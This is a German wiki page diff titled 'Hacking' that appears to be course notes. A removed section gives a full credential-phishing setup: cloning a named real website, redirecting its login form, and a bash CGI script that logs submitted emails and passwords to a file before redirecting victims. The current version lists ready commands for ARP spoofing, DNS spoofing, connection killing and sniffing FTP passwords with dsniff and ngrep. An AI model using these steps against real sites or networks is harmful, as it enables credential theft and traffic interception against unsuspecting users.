Hacking: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 1: Zeile 1:
=webseite spiegeln=
+
*[webseite spiegeln]
apt-get install apache2
 
cd /var/www/
 
rm -r html
 
==abziehen der Seite==
 
wget -l 1 -r http://www.schmeich.de
 
mv  http://www.schmeich.de html
 
*besser mit browser
 
 
 
==manipulation== 
 
ersetze in index.html
 
action="https://www.schmeich.de/login.php?login_attempt=1&lwv=110"
 
durch
 
action="http://www.schmeich.de/cgi-bin/login.cgi"
 
 
 
==cgi erstellen==
 
/usr/lib/cgi-bin/login.cgi
 
<pre>
 
#!/bin/bash
 
if [ "$REQUEST_METHOD" = "POST" ]; then
 
    if [ "$CONTENT_LENGTH" -gt 0 ]; then
 
        read -n $CONTENT_LENGTH POST_DATA <&0
 
    fi
 
fi
 
MAIL=$(echo $POST_DATA | cut -f 2 -d "&")
 
PASS=$(echo $POST_DATA | cut -f 3 -d "&")
 
echo "$MAIL $PASS" >> /tmp/geheim.log
 
 
 
cat<<HERE
 
 
 
<!doctype html>
 
 
 
<html>
 
<meta http-equiv="refresh" content="0; url=https://www.schmeich.de/" />
 
</html>
 
HERE
 
</pre>
 
 
 
==cgi aktivieren==
 
  in der conf einkommentieren
 
  und
 
  a2enmod cgid
 
 
 
 
=ettercap=
 
=ettercap=
 
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
 
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/

Version vom 13. Oktober 2015, 07:41 Uhr

  • [webseite spiegeln]

ettercap

http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/

dsniff

Dsniff Tools

Installation unter Ubuntu oder Debian 

apt-get install dsniff

Passwörter spionieren mit dsniff - Beispiele

Dsniff

sniffen
dsniff -n -i eth1 -s 1500 host  85.10.194.199 -w geheim.dat

auswerten
dsniff -r geheim.dat 
-----------------
02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp)
USER wuschel
PASS suxa

optionen
-n                  =  numerische Ausgabe                   
-i eth1             =  Schnittstelle  
-s 1500             =  Länge des Mitschnittes pro Paket
-w geheim.dat       =  schreibe in die Datei  
host 85.10.194.199  =  Muster wie bei tcpdump
-r geheim.dat       =  lese aus der Datei

Tcpkill

tcpkill port 80

optionen
port 80            =  Muster wie bei tcpdump

Arpspoof

arpspoof -t 192.168.254.7 192.168.254.5

optionen
-t 192.168.254.7   = Angriffszeil
192.168.254.5      = Mac Adresse wird mit lokaler MacAdresse vertauscht

Webspy

mozilla&
webspy 192.168.254.22

Dnsspoof

Der Nameserver muss umgeleitet werden 
ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/

hosts anlegen
192.168.254.4    www.xinux.de

dnsspoofen
dnsspoof -f hosts

Ngrep

Installation unter Ubuntu oder Debian 

apt-get install ngrep

Passwörter spionieren mit ngrep - Beispiele 

sniffen
ngrep -d eth1 -s 1500 -l -i 'PASS|USER'  port 21

optionen
-d eth1            =   Schnittstelle
-s 1500            =  Länge des Mitschnittes pro Paket
-l                 =  Ausgabe wird zeilenweise gepuffert 
-i                 =  Ignoriere Gross und Kleinschreibung  
'PASS|USER'        =  Suchmuster in den Daten PASS oder USER
port 21            =  Muster wie bei tcpdump
Abgerufen von „http://wiki.ixheim.de/index.php?title=Hacking&oldid=7426